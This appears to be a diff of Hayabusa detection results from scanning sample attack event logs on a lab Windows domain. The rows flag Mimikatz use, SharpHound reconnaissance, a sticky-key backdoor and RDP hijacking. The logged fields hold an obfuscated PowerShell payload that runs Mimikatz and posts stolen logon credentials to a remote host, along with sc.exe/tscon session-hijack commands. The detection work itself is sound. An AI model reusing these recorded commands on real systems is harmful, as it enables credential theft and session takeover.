101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
+2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
+2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
+2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
+2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
